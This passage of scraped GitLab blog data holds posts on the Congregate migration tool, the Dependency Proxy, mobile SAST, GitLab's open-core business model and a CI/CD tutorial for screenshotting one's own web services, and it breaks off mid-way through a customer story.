[{\"@type\":\"Person\",\"name\":\"Bryan May\"}],\n        \"datePublished\": \"2021-10-26\",\n      }",{"title":3880,"description":3881,"authors":3885,"heroImage":1407,"date":3887,"body":3888,"category":1119,"tags":3889},[3886],"Bryan May","2021-10-26","\n\nAs customers begin their journey with GitLab, they often start by moving their source code repositories to GitLab. The GitLab Professional Services team has been helping customers with large scale [migrations](/services/migration/) for years and during this time have built a utility to automate the migration process - [Congregate](https://gitlab.com/gitlab-org/professional-services-automation/tools/migration/congregate#congregate). To ensure we’re aligned with the [GitLab values](https://handbook.gitlab.com/handbook/values/) of transparency and collaboration, we’re making it available to customers and partners. As of today, Congregate has been moved to a [source available](https://en.wikipedia.org/wiki/Source-available_software) disposition. \n\nFor smaller customers this might not be too important because they can use [GitLab import functionality](https://docs.gitlab.com/ee/user/project/settings/import_export.html) to migrate themselves. But for customers moving hundreds or thousands of source code repositories and associated users to GitLab, this is a game changer. And perhaps most importantly, our growing team of [channel services partners](https://partners.gitlab.com/) can now leverage Congregate functionality as they help customers move data. And for each contribution that partners or customers make back to Congregate, the larger [community](/community/) benefits. \n\n## Why are you doing this? 
Customers pay you for these services!\n\nGitLab Professional Services falls under the umbrella of Customer Success and its [mission](https://about.gitlab.com/handbook/customer-success/#mission-statement) is to _deliver value to all customers by engaging in a consistent, repeatable, scalable way across defined segments so that customers see the value in their investment with GitLab_. While Professional Services needs to maintain a balanced business (we are not a cost center), we believe that our paramount goal is to help our customers. As GitLab grows and the number of customers also increases, we will rely more heavily on our channel partners. We see making Congregate source available as a means to reach the largest quantity of customers with the highest quality migration service offering. Similar to how GitLab has [over 3,000 contributions from the wider community](/blog/3000-contributors-post/), we think welcoming contributions for this migration tool will help ensure GitLab and its partners converge on a single solution rather than diverging to many. \n\n## What do you mean by _Source Available_?\n\nCongregate will be licensed under the GitLab EE license. For services partners and customers, this means:\n\n![Legal Guidelines](https://about.gitlab.com/images/blogimages/2021-10-20-migration-automation/legal-guidelines2.png)\n\n## I’m a partner, will GitLab PS support my migration?\n\n- No, but support is available on a fee-based engagement. As an example if you have a customer migration that you need support on, you can engage GitLab PS as the Prime and GitLab will work with you to subcontract the engagement to you and provide the  necessary support.  \n- If a Partner is using Congregate on its own contract directly with the customer, GitLab PS will not provide support for Congregate. As such, Congregate is a USE AT YOUR OWN RISK tool. 
\n- Customer engagements on a partner contract intending to migrate to gitlab.com can be subcontracted to GitLab PS to help with these migration activities. \n\n_Note: GitLab PS will always need to be involved for migrations to gitlab.com as certain elevated privileges are required to maintain data integrity._\n\n## It's just a bunch of scripted API calls, what's so special?\n\nCongregate is using all of the published APIs so there isn’t a ton of “secret sauce” in the project. However, we have spent time optimizing for performance using multiprocessing techniques to reduce the time it takes to gather and push data. We’ve also created a standard logging format to provide auditability of what happened during a migration. Congregate can migrate data from many popular source systems to help the majority of our prospects and customers move to GitLab.  \n\n## How can I use it?\n\nWe are releasing a learning path for partners (or customers) to earn a [certified GitLab migration engineer badge](https://gitlab.badgr.com/public/badges/zzzdONLxRaCW5cDQSlHsgw). This learning journey will initially be released to GitLab team members and partners. It will include general information about importing data into GitLab, quizzes and exams to validate your knowledge, and a hands-on workshop where you will use Congregate to move data to a test GitLab instance. Once you pass, you will receive a badge that you can post in a **#humblebrag** to your social media network - that's what social media is for, right? We recommend going through this training to understand how to use Congregate. As a partner, you can access this certification learning journey [here](https://partners.gitlab.com/prm/English/c/Training). 
\n\n![Certified Migration Services Engineer](https://about.gitlab.com/images/blogimages/2021-10-20-migration-automation/migration-badge.png){: .shadow.center}\n\n\n\n\n",[685,231,9],{"slug":3891,"featured":6,"template":689},"migrating-repositories-to-gitlab-just-became-easier","content:en-us:blog:migrating-repositories-to-gitlab-just-became-easier.yml","Migrating Repositories To Gitlab Just Became Easier","en-us/blog/migrating-repositories-to-gitlab-just-became-easier.yml","en-us/blog/migrating-repositories-to-gitlab-just-became-easier",{"_path":3897,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":3898,"content":3903,"config":3909,"_id":3911,"_type":14,"title":3912,"_source":16,"_file":3913,"_stem":3914,"_extension":19},"/en-us/blog/minor-breaking-change-dependency-proxy",{"title":3899,"description":3900,"ogTitle":3899,"ogDescription":3900,"noIndex":6,"ogImage":2028,"ogUrl":3901,"ogSiteName":673,"ogType":674,"canonicalUrls":3901,"schema":3902},"The Dependency Proxy is moving to open source","We're moving the Dependency Proxy to Core to help address Docker Hub rate limiting issues.","https://about.gitlab.com/blog/minor-breaking-change-dependency-proxy","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"The Dependency Proxy is moving to open source\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Tim Rizzi\"}],\n        \"datePublished\": \"2020-10-30\",\n      }",{"title":3899,"description":3900,"authors":3904,"heroImage":2028,"date":3906,"body":3907,"category":930,"tags":3908},[3905],"Tim Rizzi","2020-10-30","\n\n[Docker Hub recently announced](https://www.docker.com/blog/dockers-next-chapter-our-first-year/) and will soon [enforce rate limits on pull requests from Docker Hub](https://docs.docker.com/docker-hub/download-rate-limit). Starting Nov. 
2, 2020, pull rates will be limited based on your individual IP address for anonymous users or on your [pricing tier](https://www.docker.com/pricing) if you are authenticated and signed in. \n\nWhen I first read about the change, I thought, \"We have to tell people about the Dependency Proxy,\" which is meant for proxying and caching images from Docker Hub. Unfortunately, the Dependency Proxy has several limitations that will prevent you from relying on it to solve this rate-limiting issue. However, we arrived at a key question during the evaluation process: \"**Should proxying and caching images from Docker Hub be an open source feature?**\"\n\nThe short answer is yes. At GitLab, to determine what is open source and what is not, we ask ourselves: [Who cares the most about the feature?](/company/pricing/#buyer-based-open-core) Pulling images from Docker Hub is done every day by all types of developers. By supporting proxying and caching in Core, we can help developers everywhere by increasing the reliability and performance of their pipelines. The same is true for pulling packages from [npm](https://www.npmjs.com/), [Maven](https://mvnrepository.com/), [PyPI](https://pypi.org/), or any of the other most common public repositories. \n\nAs of GitLab 13.6 (Nov. 22nd, 2020), using the Dependency Proxy for proxying and caching images from Docker Hub or packages from any of the supported public repositories will be [free for all GitLab users](https://gitlab.com/gitlab-org/gitlab/-/issues/273655). Exciting, right? \n\nWe recognize that many users in our community have creative ideas on how to make GitLab an even better product. By partnering with the open source community, we can open source features even more quickly. And, we could use your help! There are a few key issues that will help everyone in the Community prepare for these upcoming Docker Hub rate limits and have faster, more reliable builds. 
\n\n### More details\n\n- [gitlab-#11582](https://gitlab.com/gitlab-org/gitlab/-/issues/11582) will add support for private groups when using the Dependency Proxy. This in-progress issue will also introduce a minor breaking change to the feature. One of the side effects of enabling the Dependency Proxy for private groups is that you will be required to sign in to Docker, even for public groups.  \n\nWhat this means is that before you can do something like:\n\n```\ndocker pull gitlab.example.com/groupname/dependency_proxy/containers/alpine:latest\n```\n\nYou must first log in by providing your username/password or personal access token (*Sorry, no anonymous pulls*)\n\n```\ndocker login gitlab.example.com\n```\n\n- [gitlab-241639](https://gitlab.com/gitlab-org/gitlab/-/issues/241639) is a very important feature that will allow you to pull images from the cache even when Docker Hub is unavailable, so long as the image and manifest have been previously added to the cache. The issue will accomplish this by caching the image's manifest as well as the associated blobs. \n- [gitlab-#208080](https://gitlab.com/gitlab-org/gitlab/-/issues/208080) will resolve a bug in which images are not pulled correctly from the cache when using certain storage configurations. \n- [gitlab-#246782](https://gitlab.com/gitlab-org/gitlab/-/issues/246782) will resolve a similar issue in which images are not pulled correctly from EC2 instances. 
\n\nAnd, if you are interested in helping the Dependency Proxy work with npm, consider contributing to these issues:\n- [gitlab-#241239](https://gitlab.com/gitlab-org/gitlab/-/issues/241239) will store the metadata associated with your npm package, so that the package can later be added to the cache.\n- [gitlab-#241243](https://gitlab.com/gitlab-org/gitlab/-/issues/241243) will add requested packages to the cache.\n- [gitlab-#241249](https://gitlab.com/gitlab-org/gitlab/-/issues/241249) will allow you to pull your npm packages from the cache.\n",[930,9],{"slug":3910,"featured":6,"template":689},"minor-breaking-change-dependency-proxy","content:en-us:blog:minor-breaking-change-dependency-proxy.yml","Minor Breaking Change Dependency Proxy","en-us/blog/minor-breaking-change-dependency-proxy.yml","en-us/blog/minor-breaking-change-dependency-proxy",{"_path":3916,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":3917,"content":3923,"config":3929,"_id":3931,"_type":14,"title":3932,"_source":16,"_file":3933,"_stem":3934,"_extension":19},"/en-us/blog/mobile-static-application-security-testing-for-android",{"title":3918,"description":3919,"ogTitle":3918,"ogDescription":3919,"noIndex":6,"ogImage":3920,"ogUrl":3921,"ogSiteName":673,"ogType":674,"canonicalUrls":3921,"schema":3922},"Android App Security Testing with SAST","Learn how to secure your Android application with Static Application Security Testing.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749666816/Blog/Hero%20Images/security-cover.png","https://about.gitlab.com/blog/mobile-static-application-security-testing-for-android","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Android App Security Testing with SAST\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Fernando Diaz\"}],\n        \"datePublished\": \"2020-12-16\",\n      
}",{"title":3918,"description":3919,"authors":3924,"heroImage":3920,"date":3926,"body":3927,"category":865,"tags":3928},[3925],"Fernando Diaz","2020-12-16","\n\nAt GitLab, everyone can contribute! [GitLab 13.5](/releases/2020/10/22/gitlab-13-5-released/) included an [integration for Mobile Static\nApplication Security Testing (SAST)](/releases/2020/10/22/gitlab-13-5-released/#sast-support-for-ios-and-android-mobile-apps) from one of our customers. For their contribution, the \n[H-E-B Digital](https://digital.heb.com/) team were [October 2020's MVP](/releases/2020/10/22/gitlab-13-5-released/#mvp).\n\nTheir contribution enables SAST for mobile applications. This includes iOS apps written in Objective-C\nand Swift as well as Android apps written in Java and Kotlin. \n\nThis blog post will go over how Mobile SAST works on Android.\n\n## Static Application Security Testing\n\n[Static Application Security Testing](https://docs.gitlab.com/ee/user/application_security/sast/) analyzes source code for known vulnerabilities.\nSAST is used to detect potentially dangerous attributes in a class, or unsafe code that can\nlead to unintended code execution, as well as other issues such as SQL Injection. More information\non SAST can be seen in the [OWASP Documentation](https://owasp.org/www-community/controls/Static_Code_Analysis).\n\nHere is a video which goes over [setting up SAST for Mobile](https://docs.gitlab.com/ee/user/application_security/sast/#experimental-features), as well as a sample application\nyou can use to get started:\n\n\u003C!-- blank line -->\n\u003Cfigure class=\"video_container\">\n  \u003Ciframe src=\"https://www.youtube-nocookie.com/embed/v0GhEHZWtdw\" frameborder=\"0\" allowfullscreen=\"true\"> \u003C/iframe>\n\u003C/figure>\n\u003C!-- blank line -->\n\nIn a nutshell, after the scanner has been configured, whenever an MR is created the\nscanner runs on the application source code and looks for patterns to determine if\nthat code is vulnerable. 
 This is covered below.\n\nInitially this analyzer supports source code analysis but we intend to [expand support for binary\nscanning](https://gitlab.com/gitlab-org/gitlab/-/issues/269915) of .ipa and .apk files in the near future.\n\n## Understanding security rules\n\nSAST for mobile applications uses the Mobile Security Framework (MobSF) to scan source code. MobSF\nuses certain rules in order to determine if an application is vulnerable. The rules used to scan\nmobile applications can be seen in their [rules file](https://github.com/MobSF/Mobile-Security-Framework-MobSF/tree/master/StaticAnalyzer/views/android/rules).\nThese rules use [regex](https://en.wikipedia.org/wiki/Regular_expression) in order to find vulnerabilities in the static code.\n \nYou can also [contribute your own rules](https://github.com/MobSF/Mobile-Security-Framework-MobSF/blob/master/.github/CONTRIBUTING.md) if you have thoughts on enhancements.\nI made a small change to [enable a regex to work on Kotlin](https://github.com/MobSF/Mobile-Security-Framework-MobSF/pull/1611).\nNot only can everyone contribute at GitLab, we encourage team members to contribute to other open source projects.\n\nNote: You will have to test your changes before they can be approved. In order to do this, you must [install\nyour branch as seen here](https://mobsf.github.io/docs/#/installation).\n\n## Adding your own scanners\n\nGitLab allows for lots of extensibility. Using our [integration guidance](https://docs.gitlab.com/ee/development/integrations/secure.html), you can bring your own scanners into the\nmerge request pipeline and the security dashboards. This was done for MobSF SAST, as well as the [WhiteSource\nDependency Scanner](/blog/whitesource-for-dependency-scanning/).\n\nI hope you enjoyed this blog post. 
Now you can start making your Android applications more secure.\nYou can reach out on Twitter and share your thoughts with us [@GitLab](https://twitter.com/gitlab)!\n",[865,685,1099,231,9],{"slug":3930,"featured":6,"template":689},"mobile-static-application-security-testing-for-android","content:en-us:blog:mobile-static-application-security-testing-for-android.yml","Mobile Static Application Security Testing For Android","en-us/blog/mobile-static-application-security-testing-for-android.yml","en-us/blog/mobile-static-application-security-testing-for-android",{"_path":3936,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":3937,"content":3943,"config":3948,"_id":3950,"_type":14,"title":3951,"_source":16,"_file":3952,"_stem":3953,"_extension":19},"/en-us/blog/monetizing-and-being-open-source",{"title":3938,"description":3939,"ogTitle":3938,"ogDescription":3939,"noIndex":6,"ogImage":3940,"ogUrl":3941,"ogSiteName":673,"ogType":674,"canonicalUrls":3941,"schema":3942},"How GitLab makes money","Monetizing open source ≠ an 'open source' company. Our CEO Sid Sijbrandij explains how we got over the barriers to monetizing an open source company.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749678896/Blog/Hero%20Images/monetizing-os.jpg","https://about.gitlab.com/blog/monetizing-and-being-open-source","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"How GitLab makes money\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Aricka Flowers\"}],\n        \"datePublished\": \"2018-11-09\",\n      }",{"title":3938,"description":3939,"authors":3944,"heroImage":3940,"date":3945,"body":3946,"category":299,"tags":3947},[2071],"2018-11-09","\nWhile the number of businesses based on open source technology is growing exponentially, that doesn't mean a profitable open source company is truly open. 
Our CEO [Sid Sijbrandij](/company/team/#sytses) believes the key lies in not just being [a steward of an open source project](/company/stewardship/), but more so in being [transparent](https://handbook.gitlab.com/handbook/values/#transparency) and [collaborative](https://handbook.gitlab.com/handbook/values/#collaboration) – going so far as to allow the public to play a role in the way the company is run. And that’s what he’s aiming to do with GitLab:\n\n>\"We want to take it one step further, where you're not only taking open source and contributing back to that project, but you're also allowing people to contribute back to what you make – in our case GitLab – to improve the company. Sometimes people from the wider community contribute to [our handbook](/handbook/) to make improvements. I think that's really exciting. And in order for us to not create a rift between GitLab the open source project and GitLab the company, we try to work out in the public. Our strategy, our OKRs (Objectives and Key Results), all of the issues we work on are out there in the public. People can see what we're doing, and comment on it. I think that's a superpower. I'm very proud that people keep contributing to GitLab and we're working really hard to keep it that way.\"\n\n## Finding the right business model: Trial and error\n\nWhile the number of open source companies is trending up, making free software profitable is not an easy feat. Sid and co-founder and Engineering Fellow [Dmitriy Zaporozhets](/company/team/#dzaporozhets) experimented with a number of business models for GitLab before finding a formula that worked.\n\n### Donations\n\n\"Dmitriy used to talk about ice cream money, which were donations,\" Sid recalls. \"They were seven bucks a month, so he and his wife could buy ice cream once a month from the donations. We tried that and got up to $1,000 in the most profitable month after having a big drive. 
But that wasn't sustainable to run a company with multiple employees.\"\n\n### Feature request fees and paid support\n\nThey also tried charging a fee to build requested features from users. But that model fell apart when people found out there were others making the same request and, instead of paying for a fraction of the feature, dropped their order with the expectation that another user or company would pay for it. Sid and Dmitriy then moved to a support model, but found it to be a catch-22. As they improved the product, fewer people needed support. But to do a less-than-stellar job in the installation of GitLab \"kind of destroys\" the brand, Sid says.\n\n### Open core\n\n\"In the end, we settled on [open core](/blog/gitlab-is-open-core-github-is-closed-source/), where [some features are paid](/pricing/). The hard thing was deciding which features are paid. I think after many years we now have a good way to determine that. The feature aimed at an individual contributor, it's open source. If it's aimed at a manager, it's in Starter. If it's aimed at a director, it's in Premium. And if it's aimed at a C-level exec, it's in Ultimate. That brings a lot of clarity and it seems to work really well, but it took us a while to figure that one out.\"\n\n## What’s next\n\nTo continue engaging with and growing GitLab’s presence in the open source community, Sid plans to open the company’s summit to the wider community. The [next summit](/events/gitlab-contribute/), which occurs every nine months, is set to include about 100 community members and customers, and that figure is expected to grow in the future.\n\nWe’re also giving folks a view into our operations via more videos and plan to open our books for all to see as soon as we can.\n\n\"We’re doing more live streaming and putting recordings up on [YouTube](https://www.youtube.com/c/gitlab),\" Sid says. 
\"I think we're at over 400 videos now, but anything we have, it doesn't matter what the quality is, we want to post it for people to consume. I'm really excited at what's happening there.\n\n\"Another thing I look forward to doing is being more open about our financials. We plan and hope to be a public company one day, and then we will be open about our financials every quarter. As soon as we have audited financials, we'll start doing those calls, even when we're still a private company.\"\n\n[Cover image](https://unsplash.com/photos/Xaanw0s0pMk) by [Jason Leung](https://unsplash.com/@ninjason) on Unsplash\n{: .note}\n",[803,9],{"slug":3949,"featured":6,"template":689},"monetizing-and-being-open-source","content:en-us:blog:monetizing-and-being-open-source.yml","Monetizing And Being Open Source","en-us/blog/monetizing-and-being-open-source.yml","en-us/blog/monetizing-and-being-open-source",{"_path":3955,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":3956,"content":3962,"config":3967,"_id":3969,"_type":14,"title":3970,"_source":16,"_file":3971,"_stem":3972,"_extension":19},"/en-us/blog/monitor-web-attack-surface-with-gitlab",{"title":3957,"description":3958,"ogTitle":3957,"ogDescription":3958,"noIndex":6,"ogImage":3959,"ogUrl":3960,"ogSiteName":673,"ogType":674,"canonicalUrls":3960,"schema":3961},"Monitor your web attack surface with GitLab CI/CD and GitLab Pages","Use this tutorial to build an automated web application screenshot report.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749682233/Blog/Hero%20Images/aleks-dahlberg-glass-unsplash.jpg","https://about.gitlab.com/blog/monitor-web-attack-surface-with-gitlab","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Monitor your web attack surface with GitLab CI/CD and GitLab Pages\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Chris Moberly\"}],\n        \"datePublished\": \"2023-01-11\",\n      
}",{"title":3957,"description":3958,"authors":3963,"heroImage":3959,"date":3964,"body":3965,"category":865,"tags":3966},[2541],"2023-01-11","\n\n_DISCLAIMER: We believe that understanding the tactics and techniques of both attackers and defenders is key to keeping our organization secure. It's important to note that GitLab security blog posts are for informational purposes only, not to provide specific security advice._\n\nAttackers love insecure web applications. Lucky for them, these applications are everywhere! Test environments, development instances, default installations with hardcoded passwords - you name it, it's out there somewhere waiting to be exploited.\n\nThe easier it becomes to deploy resources in the cloud, the more of these insecure web applications end up exposed to hacking and/or unintended access. You can get ahead of potential threats by proactively identifying and reviewing your own web application attack surface.\n\nIn this tutorial, we'll explain how you can monitor the web applications in your environment by generating a screenshot report using GitLab CI/CD, GitLab Pages, and a handful of free and open source security tools. You'll end up with a fully automated solution that can:\n\n- Identify web services on a list of addresses you own.\n- Capture screenshots of these web services.\n- Build an authenticated web portal for you to visually see each site that was discovered.\n\n## Building the solution\n\n### Start with a project\n\nInside the GitLab web interface, [create a blank project](https://gitlab.com/projects/new#blank_project). The default settings should be fine, but you should review to confirm that the default settings are appropriate. 
Pay particular attention to the \"Visibility Level\" - you may want to set this to private.\n\n![Creating a GitLab project](https://about.gitlab.com/images/blogimages/2023-01-17-monitor-web-attack-surface-with-gitlab/screenshot-create-project.png){: .shadow.medium.center}\n\n\n\n### Write the automation scripts\n\nWe'll use three scripts in this project:\n\n-  `setup.sh`: Install the required tooling.\n- `discover-services.sh`: Identify web services using [httpx](https://github.com/projectdiscovery/httpx).\n- `take-screenshots.sh`: Use [gowitness](https://github.com/sensepost/gowitness) to generate a static website containing screenshots of each identified web service.\n\nThe HTML generated by gowitness will be placed into the `public` folder, which is used by [GitLab Pages](https://docs.gitlab.com/ee/user/project/pages/) to generate a website you can click through to review the findings.\n\nEach script will generate output files which may be useful for additional analysis. These will be made available as GitLab [job artifacts](https://docs.gitlab.com/ee/ci/pipelines/job_artifacts.html), so that you can download and review them at will.\n\nTo complete this step, first create a new folder in your project called `scripts`. 
Then, add the following files into that folder:\n\n#### setup.sh\n\n```bash\n#!/bin/bash\n\n# create folder for downloaded binaries\nmkdir bin\n\n# install general pre-reqs\napt -qq update > /dev/null\napt -qq install -y wget unzip > /dev/null\n\n# install pre-reqs for gowitness\napt -qq install -y chromium > /dev/null\n\n# download tools\nwget -q https://github.com/projectdiscovery/httpx/releases/download/v1.2.5/httpx_1.2.5_linux_amd64.zip\nwget -q https://github.com/sensepost/gowitness/releases/download/2.4.2/gowitness-2.4.2-linux-amd64\n\n# unzip / move all releases to bin folder\nunzip httpx_1.2.5_linux_amd64.zip -d bin/\nmv gowitness-2.4.2-linux-amd64 bin/gowitness\nchmod u+x bin/gowitness\n```\n\n#### discover-services.sh\n\n```bash\n#!/bin/bash\n\n# You may want to dynamically generate a target file with each run.\n# For this demo, we are using a list defined inside project CI variables.\nTARGETS=$TARGET_FILE\n\n# create output directory\nmkdir ./targets\n\n# Identify web services\necho \"Identifying web services across $(cat \"$TARGETS\" | wc -l) targets...\"\ncat \"$TARGETS\" | bin/httpx -o targets/web-services.txt -p 80,443\n\necho \"Discovered $(cat targets/web-services.txt | wc -l) web services.\"\n```\n\n#### take-screenshots.sh\n\n```bash\n#!/bin/bash\n\n# Run gowitness\nbin/gowitness file -f targets/web-services.txt\nbin/gowitness report export -f report.zip\n\n# Move the report to pages outdir\nunzip report.zip\nmv gowitness public\n```\n\n\n\n### Set up the pipeline\n\nNext, we need to create the `.gitlab-ci.yml` file where we configure all of these scripts to run inside a [pipeline](https://docs.gitlab.com/ee/ci/pipelines/). 
Create this file in the root of the project with the following contents:\n\n```yaml\nstages:\n  - scan\n  - deploy\n\nscanner:\n  image: debian:bullseye\n  stage: scan\n  script:\n  - bash ./scripts/setup.sh\n  - bash ./scripts/discover-services.sh\n  - bash ./scripts/take-screenshots.sh\n  only:\n  - schedules\n  - web\n  artifacts:\n    paths:\n    - targets\n    - public\n\npages:\n  stage: deploy\n  script:\n  - echo \"\" # do nothing\n  only:\n  - schedules\n  - web\n  artifacts:\n    paths:\n    - public\n```\n\nThis file defines a pipeline with two stages:\n\n- The first stage (`scan`) runs all three scripts we created. This will generate a static website inside a folder called `public`.\n- The second stage (`deploy`) is required for GitLab Pages to work - this is where the static site is published on a publicly-accessible URL that can be configured to require GitLab authentication.\n\nYou can see we've added an `only` condition to both of these stages. This ensures that the tool doesn't run every time you make a change to the code - it runs only on a defined schedule or when you manually choose to run it via the web UI.\n\n### Define your targets\n\nYou may have noticed the `TARGET_FILE` variable inside the `discover-services.sh` script from earlier. That's a [file variable](https://docs.gitlab.com/ee/ci/variables/#cicd-variable-types) that will contain the targets you wish to scan. Defining this as a variable allows us to create a generic, portable project that can be forked and cloned without containing any specific targets.\n\nTo add some targets to your project, go to \"Settings -> CI/CD -> Variables\" and click the \"Add variable\" button. Enter `TARGET_FILE` for the \"Key\" and fill in one host name or IP address per line in the \"Value\" section. 
Make sure to add a blank line to the end of the list - this is required for the scripts to run correctly.\n\n![Creating a CI environment variable](https://about.gitlab.com/images/blogimages/2023-01-17-monitor-web-attack-surface-with-gitlab/screenshot-create-variable.png){: .shadow.center}\n\n\nWe run a similar version of this screenshot tool internally, and we generate this file dynamically by exporting all of our public addresses from our various cloud environments. If you decide to implement something like that, we'd recommend adding an additional stage to your `.gitlab-ci.yaml` file.\n\n### Schedule and run the pipeline\n\nGitLab projects have a built-in [scheduler](https://docs.gitlab.com/ee/ci/pipelines/schedules.html) that lets you automatically run pipelines at specific dates/times. You can access this inside your project at \"CI/CD -> Schedules\". Here, we'll create a new schedule to run once a week on Monday mornings.\n\n![Creating a CI schedule](https://about.gitlab.com/images/blogimages/2023-01-17-monitor-web-attack-surface-with-gitlab/screenshot-schedule.png){: .shadow.center}\n\n\nAfter saving the schedule, you can also choose to manually run the pipeline by clicking the play button shown below. If you are following along, go ahead and do this now.\n\n![Running a CI schedule](https://about.gitlab.com/images/blogimages/2023-01-17-monitor-web-attack-surface-with-gitlab/screenshot-play.png){: .shadow.center}\n\n\nYou can follow the progress of your pipeline by navigating to \"CI/CD -> Pipelines\". Click on the status of the most recent pipeline. Here, you'll see the stages we configured earlier.  If all goes well, you'll see green check marks on each stage. 
You can click on an individual stage to watch the console logs and perform any necessary troubleshooting.\n\n![CI pipeline success icons](https://about.gitlab.com/images/blogimages/2023-01-17-monitor-web-attack-surface-with-gitlab/screenshot-success.png){: .shadow.center}\n\n\n### Enable notifications\n\nOnce you've set up a schedule, you might want to be alerted whenever a new report is ready. Luckily, GitLab has you covered here!\n\nInside your project, go to \"Settings -> Integrations -> Pipeline Status Emails\". Put your email address into the \"Recipients\" field and uncheck the box \"Notify only broken pipelines\". This will send you an email each time a pipeline completes and a new screenshot report has been published to your GitLab Pages site.\n\nGitLab offers a slew of other notification options as well, including things like Slack and Teams. If you prefer one of those, you can [read more in the docs](https://docs.gitlab.com/ee/integration/).\n\n![Create pipeline notifications](https://about.gitlab.com/images/blogimages/2023-01-17-monitor-web-attack-surface-with-gitlab/screenshot-notifications.png){: .shadow.center}\n\n\n### View your GitLab Pages site\n\nOnce the pipeline has completed successfully, your site should be available. You can obtain the site's public address by going to \"Settings -> Pages\".\n\nIf you set your project to be private, then by default only project members who are authenticated to the GitLab server can view the site. You can modify these settings under \"Settings -> General -> Visibility, project features, permissions -> Pages\".\n\n![Screenshot of gowitness interface](https://about.gitlab.com/images/blogimages/2023-01-17-monitor-web-attack-surface-with-gitlab/screenshot-gowitness.png){: .shadow.center}\n\n\n## Summary\n\nWeb applications are everywhere. Often, they are deployed with vulnerable configurations and are left forgotten - unmonitored and awaiting exploitation. 
You can build a monitoring solution using GitLab and free, open-source tools that gives you a visual overview of the web apps running in your own environment.\n\nThis blog walked you through manually setting this up yourself. You can view our example project [here](https://gitlab.com/gitlab-com/gl-security/threatmanagement/redteam/redteam-public/webapp-screenshots), which was created exactly as described above. Feel free to fork or clone that project as a shortcut to setting it up from scratch yourself.\n\nWe love to find creative uses for GitLab, and this is one we use ourselves internally. If you've come up with some of your own interesting use cases, we would love to hear about them! Or, if there is anything else you'd like our security team to write about, please do let us know! You can share your thoughts in the comments below or via issues and merge requests on any of our projects.\n\nThanks for reading!\n",[865,9],{"slug":3968,"featured":6,"template":689},"monitor-web-attack-surface-with-gitlab","content:en-us:blog:monitor-web-attack-surface-with-gitlab.yml","Monitor Web Attack Surface With Gitlab","en-us/blog/monitor-web-attack-surface-with-gitlab.yml","en-us/blog/monitor-web-attack-surface-with-gitlab",{"_path":3974,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":3975,"content":3981,"config":3986,"_id":3988,"_type":14,"title":3989,"_source":16,"_file":3990,"_stem":3991,"_extension":19},"/en-us/blog/monkton-moves-to-gitlab-customer-story",{"title":3976,"description":3977,"ogTitle":3976,"ogDescription":3977,"noIndex":6,"ogImage":3978,"ogUrl":3979,"ogSiteName":673,"ogType":674,"canonicalUrls":3979,"schema":3980},"Monkton's journey to GitLab: Focusing on automation","Monkton is migrating from a suite of disparate tools to GitLab, enabling them to better help their customers build safe, secure mobile 
apps.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749670123/Blog/Hero%20Images/moving-to-gitlab-cover.png","https://about.gitlab.com/blog/monkton-moves-to-gitlab-customer-story","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Monkton's #movingtogitlab story: Going all in on automation and repeatability\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Rebecca Dodd\"},{\"@type\":\"Person\",\"name\":\"Aricka Flowers\"}],\n        \"datePublished\": \"2019-05-21\",\n      }",{"title":3982,"description":3977,"authors":3983,"heroImage":3978,"date":1936,"body":3984,"category":682,"tags":3985},"Monkton's #movingtogitlab story: Going all in on automation and repeatability",[1859,2071],"\n\nEven with all the [#movingtogitlab](/blog/movingtogitlab/) excitement last year, it never gets old to hear about folks migrating to us.\nSo when Harold Smith, CEO and co-founder of [Monkton Incorporated](https://monkton.io/) – a company dedicated to helping enterprises build safe, secure, and compliant mobile solutions – wrote about [moving Monkton to GitLab](https://medium.com/@h3smith/migration-to-gitlab-dde59fc98315) earlier this year, we asked him to sit down with us to talk about the whys and hows.\n\n## From hodge podge of tools, to consolidated lifecycle\n\n\"We’ve been using some of your competitors’ tools.\nIt sort of became a hodge podge of tools – they’re still good tools, but there are different tools to do different things in the development life cycle. 
We had known GitLab had existed for a while.\nAnd I think, like many others who know about GitLab, it was an assumption on our end that it's just a source control repository.\nThen we started to realize and peel back a little bit of everything GitLab does – the continuous integration, integrations with other services, the whole pipeline.\nWe really started to focus on it and say, 'This is something we should spend time looking into and investing in.'\n\n\"It turned out to be a really good investment of time – we’ve seen time savings just in our ability to watch projects, our onboarding.\nIt’s cutting out a lot of the managing of all these different tools and different servers.\nIt’s just one thing to go in and manage that does most of the work we need.\nIt's also a huge advantage for us and our customers operating under the constraints of a higher-security environment, that we're able to do continuous integration and development, secure DevOps, in a secure environment that passes their auditing needs.\n\n>It’s cutting out a lot of the managing of all these different tools and different servers.\nIt’s just one thing to go in and manage that does most of the work we need.\n\n\"A lot of tools we were using, like some of the other continuous integration tools, are all open source software, which is great.\nBut that comes with some responsibilities: you need to really dig to figure out how to manage it correctly, how to set things up.\nSo, that was probably the biggest disadvantage of working with a collection of open source tools that didn’t have the proper documentation that we needed to move forward.\nSo, once we started looking at GitLab, it really enabled us to consolidate those things.\nAll the documentation is one place. 
